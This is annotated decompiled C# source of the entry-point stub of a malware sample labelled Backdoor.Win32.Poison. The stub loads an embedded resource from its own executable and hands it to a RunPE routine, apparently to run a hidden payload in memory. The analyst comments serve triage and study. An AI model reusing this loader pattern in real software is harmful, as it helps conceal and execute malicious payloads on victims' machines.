// Decompiled with JetBrains decompiler
// Type: Cursor.Module1
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B3356960-2D13-4E8B-9A22-3EBE56F6B0CE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace Cursor
{
    /// <summary>
    /// Entry-point module of the decompiled sample. It is a small stub that reads
    /// one Win32 resource out of its own executable image into a managed byte
    /// array and passes those bytes to <c>x86.RunPE</c>.
    /// </summary>
    /// <remarks>
    /// Analyst notes (everything below is read off this file only):
    /// - <c>[StandardModule]</c> and the <c>VBByRefStr</c> marshalling are what a
    ///   VB.NET <c>Module</c> typically decompiles to, so the original source was
    ///   presumably VB.NET (inferred, not confirmed).
    /// - The payload lives in the sample's resource section under type "GAY",
    ///   name "69". Both are passed as plain strings, so this is presumably a
    ///   named resource rather than an integer ID (confirm in a resource viewer).
    ///   For triage, it can be extracted statically from the PE without running
    ///   the sample.
    /// - No decoding or decryption is applied to the bytes in this class. Whether
    ///   <c>x86.RunPE</c> transforms them cannot be seen from here.
    /// - None of the native return values is checked, and although every import
    ///   sets SetLastError, the last-error value is never read in this class.
    /// </remarks>
    [StandardModule]
    internal sealed class Module1
    {
        // kernel32!FindResource: looks up a resource by name and type inside the
        // module identified by hModule and returns a resource-info handle.
        [DllImport("kernel32.dll", SetLastError = true)]
        private static extern IntPtr FindResource(IntPtr hModule, string lpName, string lpType);

        // kernel32!GetModuleHandleA (ANSI entry point named explicitly): returns
        // the handle of an already-loaded module given its name. The name is
        // marshalled by reference as a VB-style string.
        [DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
        private static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string moduleName);

        // kernel32!SizeofResource: size in bytes of the resource found by
        // FindResource. Declared here as returning a signed int.
        [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
        private static extern int SizeofResource(IntPtr hModule, IntPtr hResInfo);

        // kernel32!LoadResource: returns a handle to the resource data.
        // NOTE(review): no LockResource import is declared in this class; Main
        // uses the value returned here directly as the source address for the copy.
        [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
        private static extern IntPtr LoadResource(IntPtr hModule, IntPtr hResInfo);

        /// <summary>
        /// Process entry point: copies the embedded resource ("69" of type "GAY")
        /// from the running executable into memory and calls <c>x86.RunPE</c> with
        /// those bytes and the path of the running executable.
        /// </summary>
        [STAThread]
        public static void Main()
        {
            // File name (without directory) of the process's own main module.
            string moduleName = Process.GetCurrentProcess().MainModule.ModuleName;
            // Handle of the sample's own image; resources are read from itself,
            // not from a separate file.
            IntPtr moduleHandle = Module1.GetModuleHandle(ref moduleName);
            // Locate the embedded blob: resource name "69", custom type "GAY".
            IntPtr resource = Module1.FindResource(moduleHandle, "69", "GAY");
            IntPtr source = Module1.LoadResource(moduleHandle, resource);
            int length = Module1.SizeofResource(moduleHandle, resource);
            // "length - 1 + 1" equals length; the arithmetic is overflow-checked.
            // The form looks like a decompiler rendering of a VB array bound
            // (presumably "New Byte(length - 1)") - inferred.
            byte[] numArray = new byte[checked (length - 1 + 1)];
            // Raw copy of the resource bytes into managed memory; no
            // transformation happens at this step.
            Marshal.Copy(source, numArray, 0, length);
            // x86.RunPE is not defined in this file. From its name and arguments
            // (payload bytes plus the full path of the current executable) it
            // presumably executes the blob as a PE image in memory - confirm
            // against the x86 type elsewhere in the same assembly.
            x86.RunPE(numArray, Process.GetCurrentProcess().MainModule.FileName);
        }
    }
}